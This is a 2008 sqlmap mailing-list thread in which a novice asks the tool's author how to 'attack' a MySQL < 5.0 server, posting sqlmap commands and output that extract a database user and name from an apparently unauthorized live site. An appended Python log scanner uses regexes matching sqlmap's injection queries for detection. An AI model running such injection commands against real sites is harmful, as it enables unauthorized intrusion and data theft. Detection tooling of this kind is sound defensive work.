Thread: [sqlmap-users] MySQL < 5.0.0
From: Freeman Y. <fre...@la...> - 2008-10-21 06:17:22
Am I still not able to enumerate tables in a DB even though I have the DB name in MySQL 5.0.0? I understand that I cannot get a list of DBs because of no information_schema, but even if I have a DB name I cannot enumerate the tables?

If not, how else can I attack a 5.0.0 server?

Thanks
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:37:06
Hi Freeman,

On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
> Am I still not able to enumerate tables in a DB even though I have the
> DB name in MySQL 5.0.0?

In a default configuration of MySQL >= 5.0 there is the information_schema system database which sqlmap uses to enumerate DB, tables, etc.

> I understand that I cannot get a list of DBs because of no
> information_schema, but even if I have a DB name I cannot enumerate the
> tables?
> If not, how else can I attack a 5.0.0 server?

If you read the documentation carefully, or even just run sqlmap with -h option, you see that you can provide the DB name with -D option together with the --tables option to enumerate its tables.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Freeman Y. <fre...@la...> - 2008-10-21 23:40:46
Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
>
>> Am I still not able to enumerate tables in a DB even though I have the
>> DB name in MySQL 5.0.0?
>
> In a default configuration of MySQL >= 5.0 there is the
> information_schema system database which sqlmap uses to enumerate DB,
> tables, etc.
>
>> I understand that I cannot get a list of DBs because of no
>> information_schema, but even if I have a DB name I cannot enumerate the
>> tables?
>> If not, how else can I attack a 5.0.0 server?
>
> If you read the documentation carefully, or even just run sqlmap with
> -h option, you see that you can provide the DB name with -D option
> together with the --tables option to enumerate its tables.
>
> Cheers,

Thanks but I already tried that. Here's the output with the site removed:

    C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --current-db --current-user

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
    and Daniele Bellucci <dan...@gm...>

    [*] starting at: 16:26:47

    [16:26:47] [INFO] testing connection to the target url
    [...]
    back-end DBMS: MySQL < 5.0.0

    [16:27:42] [INFO] fetching current user
    [16:27:42] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))
    [16:27:42] [INFO] retrieved: hyweljen_db@localhost
    [16:30:33] [INFO] performed 153 queries in 171 seconds
    current user: 'hyweljen_db@localhost'

    [16:30:33] [INFO] fetching current database
    [16:30:33] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
    [16:30:33] [INFO] retrieved: hyweljen_diverse
    [16:32:38] [INFO] performed 118 queries in 125 seconds
    current database: 'hyweljen_diverse'

    [16:32:38] [INFO] Fetched data logged to text files under 'C:\sqlmap/output\randomsite'

    [*] shutting down at: 16:32:38

So I've found out that the database is hyweljen_diverse.. then I run this:

    C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --eta --threads=2 -D hyweljen_diverse --tables

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
    and Daniele Bellucci <dan...@gm...>

    [*] starting at: 16:35:20

    [16:35:20] [INFO] testing connection to the target url
    [...]
    [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
    [16:36:06] [INFO] retrieved:
    [16:36:11] [INFO] performed 6 queries in 5 seconds
    back-end DBMS: MySQL < 5.0.0

    [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0

    [*] shutting down at: 16:36:11

If you look I did use -D and then --tables. What am I doing wrong?

Thanks
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 08:55:06
Hi Freeman,

On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
> ...
> [...]
> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
> [16:36:06] [INFO] retrieved:
> [16:36:11] [INFO] performed 6 queries in 5 seconds
> back-end DBMS: MySQL < 5.0.0
>
> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
>
> [*] shutting down at: 16:36:11
>
> If you look I did use -D and then --tables. What am I doing wrong?

As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so it has no information_schema. If you assume it is MySQL >= 5.0, then the current user does not have access to the information_schema system database.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Freeman Y. <fre...@la...> - 2008-10-22 08:37:45
Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
>
>> ...
>> [...]
>> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
>> [16:36:06] [INFO] retrieved:
>> [16:36:11] [INFO] performed 6 queries in 5 seconds
>> back-end DBMS: MySQL < 5.0.0
>>
>> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
>>
>> [*] shutting down at: 16:36:11
>>
>> If you look I did use -D and then --tables. What am I doing wrong?
>
> As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so
> it has no information_schema. If you assume it is MySQL >= 5.0, then the
> current user does not have access to the information_schema system
> database.
>
> Cheers,

Sorry I was mistaken, I thought that if I had the DB name then it could enumerate the tables with -D tablename and --tables even if MySQL is < 5.0.

Do you have any suggestions as to how to attack this type of DB then? I'm somewhat new to SQL injections, please bear with me :)

Thanks for your help!
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 15:12:34
Hi Freeman,

On Wed, Oct 22, 2008 at 09:33, Freeman Y. <fre...@la...> wrote:
> ...
> Sorry I was mistaken, I thought that if I had the DB name then it could
> enumerate the tables with -D tablename and --tables even if MySQL is < 5.0.

I will improve it in sqlmap 0.7. For the moment no table/column enumeration is possible on MySQL < 5.0 even if you provide the DB name.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
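
A defender-side view of the activity in this thread, as an added example that is not part of the original messages or of sqlmap's code: a log scanner that flags requests carrying the query fragments sqlmap 0.6.1 printed in the output above. The `scan` function, the log format, the IP addresses and the log lines are all constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Patterns built from the queries shown in the sqlmap output in this thread.
SIGNATURES = {
    "information_schema probe": re.compile(r"information_schema\s*\.\s*tables", re.I),
    "value extraction wrapper": re.compile(
        r"ifnull\(\s*cast\(.+?\s+as\s+char\(\d+\)\)\s*,\s*char\(32\)\)", re.I),
    "identity function": re.compile(r"\b(?:current_user|database)\s*\(\s*\)", re.I),
}

# Client address and request target from a common-log-format line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Constructed sample lines: hosts, addresses and parameters are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Oct/2008:16:27:42 +0000] "GET /index.php?id=123%20AND%20IFNULL(CAST(CURRENT_USER()%20AS%20CHAR(10000)),%20CHAR(32)) HTTP/1.1" 200 512
203.0.113.7 - - [21/Oct/2008:16:30:33 +0000] "GET /index.php?id=123%20AND%20IFNULL(CAST(DATABASE()%20AS%20CHAR(10000)),%20CHAR(32)) HTTP/1.1" 200 512
203.0.113.7 - - [21/Oct/2008:16:36:06 +0000] "GET /index.php?id=123%20AND%20(SELECT%200%20FROM%20information_schema.TABLES%20LIMIT%200,%201) HTTP/1.1" 200 498
198.51.100.20 - - [21/Oct/2008:16:36:09 +0000] "GET /index.php?id=124 HTTP/1.1" 200 2048
198.51.100.20 - - [21/Oct/2008:16:36:15 +0000] "GET /search.php?q=database%20schema%20design HTTP/1.1" 200 1024
"""


def scan(log_text):
    """Return {client_ip: Counter(signature name -> number of matching requests)}."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target = match.groups()
        # parse_qsl percent-decodes values, so encoded fragments are matched in clear text.
        values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
        for name, pattern in SIGNATURES.items():
            if any(pattern.search(v) for v in values):
                hits[ip][name] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

The benign search for "database schema design" is not flagged because the patterns require the function-call and qualified-table forms seen in the tool's output, not the bare words.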